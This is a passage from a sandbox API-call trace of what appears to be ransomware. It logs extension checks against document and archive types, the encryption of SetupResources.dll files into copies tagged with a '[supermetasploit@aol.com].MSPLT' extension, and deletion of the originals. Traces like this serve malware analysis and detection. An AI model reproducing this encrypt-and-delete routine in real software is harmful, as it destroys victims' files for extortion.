(lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.309] lstrlenW (lpString=".ppt") returned 4 [0171.309] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.309] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.309] lstrlenW (lpString=".zip") returned 4 [0171.309] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.309] lstrlenW (lpString=".rar") returned 4 [0171.310] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.310] lstrlenW (lpString=".bz2") returned 4 [0171.310] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.310] lstrlenW (lpString=".7z") returned 3 [0171.310] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.310] lstrlenW (lpString=".dbf") returned 4 [0171.310] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.310] lstrlenW (lpString=".1cd") returned 4 [0171.310] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.310] lstrlenW (lpString=".jpg") returned 4 [0171.310] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.310] lstrlenW (lpString=".doc") returned 4 [0171.310] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.310] lstrlenW (lpString=".docx") returned 5 [0171.310] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.310] lstrlenW (lpString=".pdf") returned 4 [0171.310] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.310] lstrlenW (lpString=".xls") returned 4 [0171.310] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.311] lstrlenW (lpString=".xlsx") returned 5 [0171.311] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.311] lstrlenW (lpString=".ppt") returned 4 [0171.311] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.311] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.311] lstrlenW (lpString=".zip") returned 4 [0171.311] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.311] lstrlenW (lpString=".rar") returned 4 [0171.311] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.311] lstrlenW (lpString=".bz2") returned 4 [0171.311] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.311] lstrlenW (lpString=".7z") returned 3 [0171.311] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.311] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.311] lstrlenW (lpString=".dbf") returned 4 [0171.311] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.311] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.311] lstrlenW (lpString=".1cd") returned 4 [0171.311] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.311] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0171.311] lstrlenW (lpString=".jpg") returned 4 [0171.311] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.312] Sleep (dwMilliseconds=0x64) [0171.677] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.677] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.677] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0171.678] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=18776) returned 1 [0171.678] CloseHandle (hObject=0x2d4) returned 1 [0171.678] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll")) returned 0x80 [0171.678] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.678] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0171.678] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.678] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.678] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0171.679] GetLastError () returned 0x0 [0171.679] ReadFile (in: hFile=0x2d4, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x4958, lpOverlapped=0x0) returned 1 [0171.777] WriteFile (in: hFile=0x34c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x4960, lpOverlapped=0x0) returned 1 [0171.779] ReadFile (in: hFile=0x2d4, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0171.779] WriteFile (in: hFile=0x34c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xf8, lpOverlapped=0x0) returned 1 [0171.779] SetEndOfFile (hFile=0x34c) returned 1 [0171.780] CloseHandle (hObject=0x34c) returned 1 [0171.784] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.785] SetEndOfFile (hFile=0x2d4) returned 1 [0171.786] CloseHandle (hObject=0x2d4) returned 1 [0171.786] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.787] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll")) returned 1 [0171.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.787] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.787] lstrlenW (lpString=".doc") returned 4 [0171.787] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.787] lstrlenW (lpString=".docx") returned 5 [0171.787] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.787] lstrlenW (lpString=".pdf") returned 4 [0171.787] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.787] lstrlenW (lpString=".xls") returned 4 [0171.788] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.788] lstrlenW (lpString=".xlsx") returned 5 [0171.788] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.788] lstrlenW (lpString=".ppt") returned 4 [0171.788] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.788] lstrlenW (lpString=".zip") returned 4 [0171.788] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.788] lstrlenW (lpString=".rar") returned 4 [0171.788] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.788] lstrlenW (lpString=".bz2") returned 4 [0171.788] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.788] lstrlenW (lpString=".7z") returned 3 [0171.788] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.788] lstrlenW (lpString=".dbf") returned 4 [0171.788] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.788] lstrlenW (lpString=".1cd") returned 4 [0171.788] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.788] lstrlenW (lpString=".jpg") returned 4 [0171.788] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.788] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.788] lstrlenW (lpString=".doc") returned 4 [0171.788] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.789] lstrlenW (lpString=".docx") returned 5 [0171.789] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.789] lstrlenW (lpString=".pdf") returned 4 [0171.789] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.789] lstrlenW (lpString=".xls") returned 4 [0171.789] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.789] lstrlenW (lpString=".xlsx") returned 5 [0171.789] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.789] lstrlenW (lpString=".ppt") returned 4 [0171.789] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.789] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.789] lstrlenW (lpString=".zip") returned 4 [0171.789] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.789] lstrlenW (lpString=".rar") returned 4 [0171.789] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.789] lstrlenW (lpString=".bz2") returned 4 [0171.789] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.789] lstrlenW (lpString=".7z") returned 3 [0171.789] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.789] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.789] lstrlenW (lpString=".dbf") returned 4 [0171.789] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.789] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.789] lstrlenW (lpString=".1cd") returned 4 [0171.789] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.789] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0171.789] lstrlenW (lpString=".jpg") returned 4 [0171.789] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.790] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.790] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.790] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0171.861] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=19288) returned 1 [0171.861] CloseHandle (hObject=0x2f4) returned 1 [0171.861] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll")) returned 0x80 [0171.861] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.861] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0171.861] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.861] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.861] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0171.862] GetLastError () returned 0x0 [0171.862] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x4b58, lpOverlapped=0x0) returned 1 [0172.217] WriteFile (in: hFile=0x36c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x4b60, lpOverlapped=0x0) returned 1 [0172.218] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.219] WriteFile (in: hFile=0x36c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xf8, lpOverlapped=0x0) returned 1 [0172.219] SetEndOfFile (hFile=0x36c) returned 1 [0172.219] CloseHandle (hObject=0x36c) returned 1 [0172.223] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.223] SetEndOfFile (hFile=0x2f4) returned 1 [0172.224] CloseHandle (hObject=0x2f4) returned 1 [0172.225] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.225] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll")) returned 1 [0172.225] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.225] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.225] lstrlenW (lpString=".doc") returned 4 [0172.225] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.225] lstrlenW (lpString=".docx") returned 5 [0172.226] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.226] lstrlenW (lpString=".pdf") returned 4 [0172.226] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.226] lstrlenW (lpString=".xls") returned 4 [0172.226] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.226] lstrlenW (lpString=".xlsx") returned 5 [0172.226] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.226] lstrlenW (lpString=".ppt") returned 4 [0172.226] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.226] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.226] lstrlenW (lpString=".zip") returned 4 [0172.226] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.226] lstrlenW (lpString=".rar") returned 4 [0172.226] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.226] lstrlenW (lpString=".bz2") returned 4 [0172.226] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.226] lstrlenW (lpString=".7z") returned 3 [0172.226] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.226] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.226] lstrlenW (lpString=".dbf") returned 4 [0172.226] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.226] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.226] lstrlenW (lpString=".1cd") returned 4 [0172.226] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.226] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.226] lstrlenW (lpString=".jpg") returned 4 [0172.226] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.227] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.227] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.227] lstrlenW (lpString=".doc") returned 4 [0172.227] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.227] lstrlenW (lpString=".docx") returned 5 [0172.227] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.227] lstrlenW (lpString=".pdf") returned 4 [0172.227] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.227] lstrlenW (lpString=".xls") returned 4 [0172.227] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.227] lstrlenW (lpString=".xlsx") returned 5 [0172.227] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.227] lstrlenW (lpString=".ppt") returned 4 [0172.227] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.227] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.227] lstrlenW (lpString=".zip") returned 4 [0172.227] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.227] lstrlenW (lpString=".rar") returned 4 [0172.227] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.227] lstrlenW (lpString=".bz2") returned 4 [0172.227] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.227] lstrlenW (lpString=".7z") returned 3 [0172.227] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.227] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.227] lstrlenW (lpString=".dbf") returned 4 [0172.227] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.227] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.227] lstrlenW (lpString=".1cd") returned 4 [0172.227] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.228] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0172.228] lstrlenW (lpString=".jpg") returned 4 [0172.228] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.228] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0172.228] lstrlenW (lpString="SetupResources.dll") returned 18 [0172.228] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0172.258] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=14168) returned 1 [0172.258] CloseHandle (hObject=0x37c) returned 1 [0172.258] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll")) returned 0x80 [0172.258] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.258] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0172.258] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.258] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.258] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0172.264] GetLastError () returned 0x0 [0172.264] ReadFile (in: hFile=0x37c, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x3758, lpOverlapped=0x0) returned 1 [0172.291] WriteFile (in: hFile=0x36c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x3760, lpOverlapped=0x0) returned 1 [0172.292] ReadFile (in: hFile=0x37c, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.292] WriteFile (in: hFile=0x36c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xf8, lpOverlapped=0x0) returned 1 [0172.293] SetEndOfFile (hFile=0x36c) returned 1 [0172.293] CloseHandle (hObject=0x36c) returned 1 [0172.294] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.294] SetEndOfFile (hFile=0x37c) returned 1 [0172.295] CloseHandle (hObject=0x37c) returned 1 [0172.295] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.296] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll")) returned 1 [0172.296] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.296] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.296] lstrlenW (lpString=".doc") returned 4 [0172.296] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.296] lstrlenW (lpString=".docx") returned 5 [0172.296] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.296] lstrlenW (lpString=".pdf") returned 4 [0172.296] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.296] lstrlenW (lpString=".xls") returned 4 [0172.296] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.296] lstrlenW (lpString=".xlsx") returned 5 [0172.296] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.296] lstrlenW (lpString=".ppt") returned 4 [0172.296] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.296] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.296] lstrlenW (lpString=".zip") returned 4 [0172.296] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.296] lstrlenW (lpString=".rar") returned 4 [0172.296] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.296] lstrlenW (lpString=".bz2") returned 4 [0172.296] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.296] lstrlenW (lpString=".7z") returned 3 [0172.297] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.297] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.297] lstrlenW (lpString=".dbf") returned 4 [0172.297] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.297] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.297] lstrlenW (lpString=".1cd") returned 4 [0172.297] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.297] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.297] lstrlenW (lpString=".jpg") returned 4 [0172.297] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.297] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.297] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.297] lstrlenW (lpString=".doc") returned 4 [0172.297] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.297] lstrlenW (lpString=".docx") returned 5 [0172.297] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.297] lstrlenW (lpString=".pdf") returned 4 [0172.297] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.297] lstrlenW (lpString=".xls") returned 4 [0172.297] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.297] lstrlenW (lpString=".xlsx") returned 5 [0172.297] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.297] lstrlenW (lpString=".ppt") returned 4 [0172.297] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.297] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 45 [0172.297] lstrlenW (lpString=".zip") returned 4 [0172.297] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.297] lstrlenW (lpString=".rar") returned 4 [0172.297] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.297] lstrlenW (lpString=".bz2") returned 4 [0172.297] lstrcmpiW 